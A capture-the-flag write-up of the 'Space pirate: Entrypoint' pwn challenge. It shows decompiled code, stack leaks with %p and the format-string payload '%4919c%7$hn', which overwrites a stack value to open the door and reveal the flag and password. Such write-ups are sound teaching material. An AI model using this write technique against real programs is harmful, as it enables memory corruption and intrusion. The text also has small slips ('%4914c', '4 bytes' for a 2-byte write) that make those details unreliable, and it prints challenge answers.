Space pirate: Entrypoint
A standard FSB challenge
Initial Impressions
We are given a 64-bit binary file that upon running gives us two options.
โโโ(kaliใฟkali)-[~/Desktop/CTF/PWN/htb_spacepirate_entrypoint]
โโ$ ./sp_entrypoint
Authentication System
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ โโโ โโโ โโโ โโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ โโโ โโโ โโโ โโโ โโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโ โโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโ โโโโโ โโโ โโโ โโโ โโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโ โโ โโโ โโโโโ โโโ โโโ โโโ โโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1. Scan card ๐ณ
2. Insert password โช๏ธ
>
Looking at the decompiled main
function in Ghidra, it gives us two functions of interest, open_door
and check_pass
.
undefined8 main(void)
{
long lVar1;
long in_FS_OFFSET;
long local_48;
long *local_40;
char local_38 [40];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
setup();
banner();
local_48 = 0xdeadbeef;
local_40 = &local_48;
printf(&DAT_001025e0);
lVar1 = read_num();
if (lVar1 != 1) {
if (lVar1 == 2) {
check_pass();
}
printf(&DAT_00102668,&DAT_0010259a);
/* WARNING: Subroutine does not return */
exit(0x1b39);
}
printf("\n[!] Scanning card.. Something is wrong!\n\nInsert card\'s serial number: ");
read(0,local_38,0x1f);
printf("\nYour card is: ");
printf(local_38);
if (local_48 == 0xdead1337) {
open_door();
}
else {
printf(&DAT_001026a0,&DAT_0010259a);
}
if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
return 0;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
The open_door()
function prints out the flag to us while the check_pass()
authenticates us if our input is 0nlyTh30r1g1n4lCr3wM3mb3r5C4nP455
.
void check_pass(void)
{
int iVar1;
long in_FS_OFFSET;
undefined8 local_28;
undefined8 local_20;
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_28 = 0;
local_20 = 0;
printf("[*] Insert password: ");
read(0,&local_28,0xf);
iVar1 = strncmp("0nlyTh30r1g1n4lCr3wM3mb3r5C4nP455",(char *)&local_28,0x21);
if (iVar1 != 0) {
printf(&DAT_001025a8,&DAT_0010259a);
/* WARNING: Subroutine does not return */
exit(0x1b39);
}
open_door();
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
However, that is impossible as the input is only accepting 15 bytes of input (Oxf).
Looking back at the main
function, we see a possible FSB vulnerability on line 27 and 29 where our input is being displayed directly with printf
.
This can be easily tested with %p
which leaks a value of the stack.
1. Scan card ๐ณ
2. Insert password โช๏ธ
> 1
[!] Scanning card.. Something is wrong!
Insert card's serial number: %p
Your card is: 0x7ffde61a8660
We can also see that the variable declared earlier local_48
is on the stack 0xdeadbeef
.
Exploit
To successfully get the flag, we need to
Leak the location of the pointer to
local_48
on the stackOverwrite the contents of
local_48
to be equivalent0xdead1337
to pass the check
Using %p.%p.%p.%p.%p.%p.%p
, we can see that local_48
is on the 6th position on the stack.
Insert card's serial number: %p.%p.%p.%p.%p.%p.%p.%p
Your card is: 0x7ffde61a8660.0x7fab257ed8c0.(nil).0xf.0x21676e6f72772073.0xdeadbeef.0x7ffde61aad00.0x70252e70252e7025
With the use of pwndbg, we can see that the pointer to local_48
is on the 7th position on the stack 0x7fffffffdc68
pointing to 0x7fffffffdc60
.
00:0000โ rsp 0x7fffffffdc58 โโธ 0x555555400d78 (main+130) โโ lea rdi, [rip + 0x18d9]
01:0008โ 0x7fffffffdc60 โโ 0xdeadbeef
02:0010โ 0x7fffffffdc68 โโธ 0x7fffffffdc60 โโ 0xdeadbeef
03:0018โ rsi 0x7fffffffdc70 โโธ 0x7ffff7c10b40 โโ push rbp
04:0020โ 0x7fffffffdc78 โโ 0x0
05:0028โ 0x7fffffffdc80 โโธ 0x555555400e20 (__libc_csu_init) โโ push r15
06:0030โ 0x7fffffffdc88 โโธ 0x555555400940 (_start) โโ xor ebp, ebp
07:0038โ 0x7fffffffdc90 โโธ 0x7fffffffdd80 โโ 0x1
pwndbg> continue
Continuing.
%p.%p.%p.%p.%p.%p.%p
Your card is: 0x7fffffffb5c0.0x7ffff7bed8c0.(nil).0xf.0x21676e6f72772073.0xdeadbeef.0x7fffffffdc60
We can then $hn
to overwrite the last word (4 bytes) of 0xdeadbeef
with %4914c
which translates to 1337
in decimal., making local_48 = 0xdead1337
.
The %n
specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written and also where we write to.
This makes our final payload %4919c%7$hn
, with %7
referring to the pointer to local_48
and $hn
referring to the beef
portion of 0xdeadbeef
which we are trying to overwrite.
Insert card's serial number: %4919c%7$hn
Your card is: ๏ฟฝ
[+] Door opened, you can proceed with the passphrase: HTB{g4t3_0n3_d4rkn3e55_th3_w0rld_0f_p1r4t35}
Last updated